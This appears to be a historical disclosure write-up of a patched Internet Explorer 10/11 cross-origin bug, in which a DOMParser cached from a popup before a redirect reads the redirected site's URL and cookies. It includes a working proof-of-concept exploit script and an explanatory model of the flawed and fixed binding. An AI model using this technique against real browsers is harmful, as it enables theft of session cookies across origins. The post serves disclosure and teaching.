By saving a reference to a DOMParser instance created in a new window before it redirects, and then calling parseFromString on that cached instance after the redirect, the resulting document ends up associated with the redirected domain’s origin — giving access to its cookies and URL.
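var dp, doc;

function main() {
    // Open a page that redirects to another domain.
    var win = window.open("redirect.aspx", "", "width=400,height=400");
    // The alert in the new window supplies the delay while the redirect completes.
    win.setTimeout('alert("Please, don\'t close this alert.");');
    // Cache a DOMParser created in the new window before it redirects.
    dp = win.eval('new DOMParser()');
    // After the redirect, parse with the cached instance and show the document's URL and cookie.
    setTimeout('doc = dp.parseFromString("<h></h>", "text/xml"); alert("document.URL: " + doc.URL + "\\n\\ndocument.cookie: " + doc.cookie)', 4000);
}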
The user-facing alert in the new window provides the timing delay needed for the redirect to complete. Once Bing (or whichever target) has loaded, the cached dp instance creates a document whose URL and cookie properties reflect the redirected origin. Tested on IE10 / IE11 build 20130227-2100.
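The following is an added example, not code from the original post or from Internet Explorer: a simplified model of the kind of binding mistake that produces this behaviour, next to a parser that pins its owner document at creation time. The class names, the window-proxy model and the two example hosts are assumptions made for illustration.

```javascript
// Simplified model (an assumption, not Internet Explorer's code).
// A window proxy stays the same object across navigations; the inner
// window behind it is replaced each time a new document loads.
class InnerWindow {
  constructor(url, cookie) {
    this.document = { URL: url, cookie: cookie, origin: new URL(url).origin };
  }
}

class WindowProxy {
  constructor(url, cookie) { this.inner = new InnerWindow(url, cookie); }
  navigate(url, cookie) { this.inner = new InnerWindow(url, cookie); }
}

// Flawed: keeps the proxy and resolves the owner document on every call,
// so a parser cached before a redirect picks up the redirected document.
class LateBoundParser {
  constructor(proxy) { this.proxy = proxy; }
  parseFromString() {
    const owner = this.proxy.inner.document;
    return { URL: owner.URL, cookie: owner.cookie, origin: owner.origin };
  }
}

// Hardened: pins the inner window that created the parser, so documents it
// produces keep the creating document's URL and origin after a navigation.
class CreationBoundParser {
  constructor(proxy) { this.home = proxy.inner; }
  parseFromString() {
    const owner = this.home.document;
    return { URL: owner.URL, cookie: owner.cookie, origin: owner.origin };
  }
}

// Replays the sequence from the post against either parser model.
function demo(ParserClass) {
  // Constructed sample values; both hosts are placeholders.
  const win = new WindowProxy("https://opener.example/redirect.aspx", "a=1");
  const dp = new ParserClass(win); // cached before the redirect
  win.navigate("https://target.example/", "session=secret");
  return dp.parseFromString();     // called after the redirect
}
```

With `LateBoundParser` the returned document carries the redirected origin and its cookie string; with `CreationBoundParser` it stays bound to the page that created the parser.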
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.